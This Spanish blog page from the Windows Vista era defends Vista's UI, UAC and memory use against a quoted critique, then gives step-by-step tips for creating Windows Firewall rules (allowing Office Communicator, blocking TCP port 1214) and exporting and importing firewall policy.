Con respecto a las ventanas de Windows Vista, dejo un documento en el que explica cómo es el diseño de las ventanas del Vista. Ya sabes, eso de la homogeneización. Es un nuevo modelo que se le ha ocurrido a un tonto para que a los técnicos les sea un pelín más fácil adecuarse al manejo y monitorización de múltiples aplicaciones. Vamos, para que no nos distraigamos y la caguemos. Lo incorporan casi todas las aplicaciones de Spectra y las consolas se basan ya en la nueva MMC 3.0. El documento lo tenéis aquí.  Aero Wizard

Un ejemplo:
la tipica ventana “Propiedades de la barra de tareas y del menu de inicio” sigue estando ahí. Pero ahora para llegar a ella tienes que seguir un turtuoso camino de ventanas en plan web, para que “navegues” hasta ella. Pero cuando sale esta opcion, plaf, rompe totalmente con el estilo de navegacion. Y se nota que todo lo anterior es un plaston inutil.
Si para sacar esta ventana me basta “boton derecho->propiedades” en XP, y es la misma ventana, todo lo que se ha añadido solo sirve para forzarme un tipo de uso (navegación) en lugar del natural de un pc de botón derecho->propiedades.
Estéticamente hablando, es bonito ver las ventanas que te va poniendo, segun navegas hasta la opcion que quieres. Pero cuando sale esta, y es lo mismo de siempre, de diseño “antiguo” y de filosofia opuesta. El golpe es brutal. Como ligarse una tia, y cuando llevas al hotel se baja la falda y sale un pene enorme
.”

Esa opción sigue estando igual de escondida que en Spectra XP… Botón derecho sobre el icono de Spectra–> Propiedades…

Sobre la navegación en plan Web, Spectra decidió en su nuevo sistema operativo, poner el mayor número de opciones de forma visible, de tal forma que un usuario no se liase demasiado al encontrarse una opción. Acostúmbrate.  

Esto es lo que yo he visto, y me da hasta pena. Huele totalmente al típico proyecto de software al que se le acaba un plazo duro. Asi que tiene que liberar “como sea”, de modo que cogen las partes que si funcionan, lo ponen todo junto, y lo liberan. Windows Vista no merece ni siquiera el nombre de alfa, porque no es una versión completa del siguiente windows, sino varias partes inconexas unidas con esparadrapo, y que se nota que no estan todas las features planeadas. Esta mas al nivel de una de esas distros de XP que hace la gente, como Windows UE y cosas asi, aunque estas distros piratas de windows me parecen mas coherentes incluso que Vista

O sea, que las 800 nuevas políticas, UIPI, MIC, integración con NAP, nuevo Firewall integrado con IPSEC, shadow copy, media center, soporte nativo IPV6, ASLR, etc.., estaban incluidas ya en Windows XP? Y nosotros aquí sin enterarnos?

Sobre lo que gente comenta. Pues no he debito tener mala suerte. Puede que sea porque es una instalación desde cero, pero no me ha pedido muchas veces la password de administrador. Lo que si hace es avisarme que un cambio es importante, acepto el cambio, y luego me salta a la tipica modal que oscurece el fondo, que me vuelve a preguntar si estoy seguro, pero esta incrementalmente mas en serio (aunque tampoco me pide password).. WTF???. Entendería que me pidiera una confirmación de si o no. Entendería que me pidiera una contraseña (con su botón de cancelar). Lo que no tiene sentido son dos ventanas de “aceptar”-“cancelar”.
Esto es otro cambio, que lo han dejado a mitad
.”

Vamos a ver, el UAC se puede configurar a través de políticas. Por defecto viene configurado para introducir la password una vez (al inicio de sesión). Si necesitas hacer un cambio importante en el equipo, el aceptar la condición de cambio implica la herencia de esas credenciales que inicialmente pusiste en el inicio de sesión. Si lo que quieres es más seguridad, hay otra política que cambia este comportamiento, pidiéndo credenciales cada vez que hagas un nuevo cambio. Pero viendo la profesionalidad de este documento, seguro que ya lo sabías.

“Como las ventanas de estilo Windows 2000 no se pueden eliminar. He probado a configurar vista con el estilo clásico. Asi por lo menos, todas las opciones son coherentes. Solo que Windows 2000 come menos de 64 MB, y esta cosa unos 300 MB. “

Seguro que W2k va muchísimo más rápido que Windows Vista, ya que éste tiene las opciones de Prefetch y SuperFetch. O era al revés?

O sea, que según tú, mientras menos memoria RAM consuma un equipo, éste es más eficiente? Cuando una aplicación quiere algún dato o información, es más rápido el acceso al disco o el acceso a la memoria? Vista consume más memoria para que éste sea mucho más rápido, las aplicaciones inicien mucho antes y no haya ese retraso que tenemos en otros sistemas operativos, a la hora de cargar y descargar memoria. Si tienes RAM comprada, que el sistema operativo la use no?

Y puede que sea una tecnología que la haya inventado un tonto, porque si no no me explico que los nuevos discos duros vengan de forma híbrida, con una pequeña memoria flash para intercambiar o precargar datos entre disco y memoria interna, haciendo el acceso a los datos o aplicaciones mucho más rápido.

Que lo dicho, la ciudad de los krispis y este profesional desde su rincón en /. dicen que vista se muere. Toda esta tecnología a la mierda. Apaga y vámonos. Qué mala suerte. Todos los técnicos que nos dedicamos a Windows somos capullos. Gracias por aclarárnoslo. Ustedes sois los técnicos, ustedes sois los mejores.

Vista Tip Básico: Exportar configuración de Windows Firewall

Estándar

Una vez configurado nuestro Firewall para bloquear el puerto TCP 1214 y aceptar comunicaciones procedentes de la aplicación Office Communicator, procederemos a exportar la configuración del Firewall, para después poder importarla a cuantas máquinas queramos.

Estando en la consola de administración del Firewall de Windows Vista, procederemos a exportar la configuración, pulsando en Export Policy, tal y como aparece en la imagen

ExportPolicy

Podemos salvar las políticas en nuestro servidor, para tener un mayor control sobre ellas.

ExportPolicy2

Acto seguido podemos ir máquina por máquina e importar la configuración. Lo único que tendremos que hacer es pulsar en Import Policy, tal y como viene en la imagen

ImportPolicy

Una vez importadas las directivas del Firewall, el asistente nos avisará de que las políticas han sido importadas correctamente

ImportedPolicy2

Y lo único que nos queda por hacer, es comprobar que las políticas están ahí

Test

Test2

Recordad que todo esto también se puede realizar si estuviésemos bajo un controlador de dominio, pero esto ya lo veremos más adelante…

Vista Tip Básico: Configurar Windows Firewall

Estándar

En este pequeño tip podréis ver lo dificilísimo que es configurar un par de reglas en el nuevo firewall de Windows Vista.

Escenario: Tienes a tu cargo una red de unos 20 equipos, todos ellos bajo un controlador de dominio. Necesitas instalar una aplicación llamada Microsoft Office Communicator en uno de los equipos, y para ello también debes asignarle una regla de acceso al firewall. La aplicación está alojada en el controlador de dominio, y su ruta es \\DC1\Sources\communicator.msi También te han pedido que debes bloquear el puerto TCP 1214, correspondiente a una aplicación P2P, la cual está terminando con el ancho de banda de tu red.

Como primer paso vamos a ir a una de las máquinas cliente, y en la caja de texto de búsqueda escribimos la ruta de instalación de la aplicación Office Communicator, tal y como está en la imagen:

Start Search

Acto seguido nos saldrá el asistente de instalación de la aplicación. Como buen msi que es, no tiene mayor dificultad que ir siguiendo los pantallazos que nos va indicando.

Office Communicator

Una vez que esté la aplicación instalada, salimos de la sesión y nos logueamos como administrador local de la máquina.

LogOnVista

Y buscamos una consola de administración (Microsoft Management Console) para poder cargar nuestro Firewall.

SearchMMC

Al querer abrir una consola de administración, el UAC (Control de cuentas de usuario) salta diciéndonos que para toda acción que pueda cambiar el sistema. Esta es una de las nuevas funcionalidades de Windows Vista. El sistema cumple el principio del menor número de privilegios posibles al lanzar una aplicación, sea el perfil que sea.

UAC

Pulsamos en Aceptar (Continue) y acto seguido se nos abrirá una bonita consola de administración, en la cual podremos añadir o quitar funcionalidades. Nosotros agregaremos la consola de administración de Firewall. Pulsamos en Archivo –> Agregar o quitar complemento y añadimos la consola de Firewall, tal y como viene en la imagen.

snap-ins Firewall

Firewall Vista

Con la consola de Firewall funcionando, crearemos una regla de acceso de entrada (Inbound Rule), y lo haremos de la siguiente manera:

Pulsaremos en Inbound Rule, y en la parte de la derecha de la consola, pulsaremos en New Rule (Añadir regla). Nos saldrá un asistente de creación de reglas de entrada.

Inbound Rule

Como vamos a crear una regla para una aplicación específica, crearemos la regla para un programa, tal y como aparece en la imagen superior. Pulsamos en Next.

Inbound Rule 2

Esta parte del asistente nos preguntará a qué aplicación le va a afectar esta regla. Tan sólo tendremos que poner la ruta en donde se encuentra la aplicación. Pulsamos Next.

Inbound Rule 3

Nos pregunta qué deseamos hacer con esta regla. Permitir, denegar, permitir bajo unas condiciones seguras, etc.. Nosotros marcaremos permitir todas las conexiones. Pulsamos Next.

Inbound Rule 4

A qué tipo de escenario va a afectar la regla? Como es un portátil, y sabemos que el que lo va a utilizar va a tener cierta movilidad, marcaremos los 3 escenarios posibles, dominio, red privada y red pública. Pulsamos Next.

Inbound Rule 5

Nos pide un nombre para la regla. En este caso he puesto Office Communicator, para no perderme. Pulsamos en Finish y tendremos nuestra regla creada!

Segunda parte

Tenemos que bloquear un determinado puerto TCP, por lo que crearemos una regla de salida para un puerto determinado. Esta vez pulsaremos con el ratón el apartado Outbound Rules y en la parte de la derecha pulsaremos New Rule. Nos saldrá un asistente parecido al anterior, pero esta vez de salida.

Outbound Rule

Como es un determinado puerto el que vamos a “capar”, marcaremos la opción Port. Pulsamos Next.

OutBound Rule 2

El asistente nos preguntará si el puerto es TCP o UDP, si la regla se aplica a todos los puertos o a alguno en específico. Sabemos que el número de puerto es el 1214 y es un puerto TCP. Marcamos las opciones y pulsamos Next.

Outbound Rule 3

La siguiente parte es para preguntarnos qué debemos hacer. Como queremos bloquear ese puerto, pulsamos Block. Acto seguido pulsamos Next.

OutBound Rule 4

Esta parte del asistente nos preguntará a qué tipo de escenario se le va a aplicar la regla. Marcaremos los 3 posibles y pulsaremos Next.

OutBound Rule 5

Definimos un nombre para la regla listo! Tenemos nuestra regla de salida configurada!!

OutBound Rule 6